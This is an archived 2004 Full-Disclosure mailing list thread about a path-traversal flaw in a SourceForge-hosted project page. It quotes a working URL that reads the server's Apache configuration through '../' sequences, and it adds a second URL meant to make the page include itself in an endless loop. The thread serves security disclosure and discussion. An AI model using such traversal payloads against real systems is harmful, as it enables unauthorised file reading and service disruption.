lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: andrewp at IRW.co.uk (Andrew Poodle)
Subject: Vulnerability in sourceforge.net

Don't even think about trying this then...

http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3

Don't want to crash sourceforge by getting it into an infinite loop now do we?

a

> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com]On Behalf Of nicolas
> vigier
> Sent: 21 July 2004 09:00
> To: Alexander
> Cc: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
> 
> 
> On Wed, 21 Jul 2004, Alexander wrote:
> 
> > Vulnerability in sourceforge.net.
> > 
> > Remote user can read any files. Example:
> 
> Any file the webserver account can read.
> 
> > 
> http://btmgr.sourceforge.net/index.php3?body=../../../../../..
> /usr/local
> > /apache/conf/httpd.conf
> 
> This is not a vulnerability in sourceforge, but in on of the project's
> webpage. And anyone with a project on sourceforge can read the same
> files using his webspace.
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any person without subsequent written confirmation of its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no liability (including in negligence) for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by those persons of subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this e-mail message is strictly prohibited.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ